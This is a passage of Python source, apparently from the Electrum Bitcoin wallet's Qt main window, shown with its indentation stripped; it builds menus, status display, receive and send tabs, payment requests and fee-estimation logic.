wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
